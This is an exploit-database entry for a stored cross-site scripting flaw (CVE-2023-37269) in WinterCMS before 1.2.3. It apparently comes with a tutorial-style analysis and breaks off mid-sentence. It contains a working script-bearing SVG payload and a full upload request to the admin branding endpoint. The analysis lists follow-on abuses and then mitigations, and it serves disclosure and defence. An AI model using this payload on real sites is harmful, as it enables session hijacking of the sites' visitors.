WinterCMS < 1.2.3 - Persistent Cross-Site Scripting

Exploit Author: abhishek morla Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-07-15 
# Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting
# Exploit Author: abhishek morla
# Google Dork: N/A
# Date: 2023-07-10
# Vendor Homepage: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter
# Version: 1.2.2
# Tested on: windows64bit / mozila firefox 
# CVE : CVE-2023-37269
# Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3
# Video POC : https://youtu.be/Dqhq8rdrcqc

Title : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload Functionality

Description :
WinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a Persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious script

Payload:- 
// image.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>

//Post Request

POST /backend/system/settings/update/winter/backend/branding HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2
X-WINTER-REQUEST-HANDLER: formLogo::onUpload
Content-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206
Content-Length: 608
Origin: http://172.17.0.2
Connection: close
Cookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D

-----------------------------186411693022341939203410401206
Content-Disposition: form-data; name="file_data"; filename="image.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>

-----------------------------186411693022341939203410401206--



|-----------------------------------------EOF-----------------------------------------


WinterCMS < 1.2.3: Persistent Cross-Site Scripting via SVG File Upload Vulnerability

WinterCMS, a popular open-source content management system built on Laravel, has recently come under scrutiny due to a critical security flaw identified in versions prior to 1.2.3. This vulnerability, tracked as CVE-2023-37269, exposes the platform to persistent cross-site scripting (XSS) attacks through a seemingly innocuous feature: the custom logo upload functionality.

Understanding the Vulnerability

At its core, this exploit leverages the lack of proper validation and sanitization when uploading SVG (Scalable Vector Graphics) files. While SVGs are widely used for logos and icons due to their scalability and resolution independence, they are also capable of embedding executable JavaScript code—making them a potent vector for malicious payloads.

Unlike traditional XSS attacks that are transient (e.g., reflected XSS), this vulnerability is persistent—meaning the malicious script remains on the server and executes every time the affected page is loaded, regardless of user authentication status. This makes it particularly dangerous for public-facing websites where anonymous visitors can be targeted.

Exploit Mechanism: How the Attack Works

An attacker uploads a malicious SVG file containing embedded JavaScript code. The server processes the file without filtering or sanitizing its content, allowing the script to be stored in the site's branding assets. When the logo is rendered on the frontend, the browser parses the SVG and executes the script, effectively compromising any user visiting the site.





 
 
      alert(document.cookie);

Explanation: This SVG file contains a simple JavaScript alert that triggers upon rendering. The <script> tag is embedded directly within the SVG document. When the browser loads this file as a logo, it executes the script—revealing the user's session cookies. In a real-world attack, this could be replaced with more sophisticated payloads such as:

  • Stealing session tokens or authentication cookies
  • Redirecting users to phishing sites
  • Injecting malicious scripts to manipulate DOM elements
  • Exfiltrating sensitive data via beacon requests

Attack Vector: Backend Branding Endpoint

The vulnerability is triggered through the /backend/system/settings/update/winter/backend/branding endpoint, which handles logo uploads via the formLogo::onUpload handler. This endpoint accepts multipart form data, including the SVG file as file_data.


POST /backend/system/settings/update/winter/backend/branding HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2
X-WINTER-REQUEST-HANDLER: formLogo::onUpload
Content-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206
Content-Length: 608
Cookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D

Key Observations: The request includes:

  • X-CSRF-TOKEN — indicates the request is authenticated, suggesting the attacker must be logged in as an admin
  • X-WINTER-REQUEST-HANDLER — specifies the handler function responsible for processing the upload
  • Cookie — contains session tokens, which the malicious script could potentially steal

Since the exploit requires admin-level access to upload the logo, it is a privilege escalation vector. However, once the malicious SVG is uploaded, the vulnerability becomes accessible to all users—authenticated or not—making it a high-impact, persistent XSS threat.

Real-World Impact and Risks

Consider a scenario where a WinterCMS-based website hosts a public-facing blog or e-commerce platform. An attacker with admin credentials uploads a malicious SVG logo. Every visitor to the site—including anonymous users—will have their cookies exposed or redirected to a malicious page. This could result in:

  • Session hijacking
  • Phishing attacks
  • Browser-based data exfiltration
  • Malware distribution via script injection

Because the script persists on the server, it remains active until the logo is removed or replaced—making it difficult to detect and remediate without active monitoring.

Security Recommendations and Mitigations

To prevent such vulnerabilities, developers and administrators should implement the following security controls:

  • Input Validation: Reject SVG files containing <script> tags or any executable content.
  • Content Sanitization: Strip or disable scripting elements during SVG processing.
  • File Type Restrictions: Limit uploads to safe formats (e.g., PNG, JPEG) and reject SVG unless strictly necessary.
  • Security Headers: Use X-Content-Type-Options: nosniff to prevent browser interpretation of SVG as executable.
  • Automated Scanning: Integrate tools like SVG sanitizers or static analysis to detect embedded scripts.

Vendor Response and Patching

The WinterCMS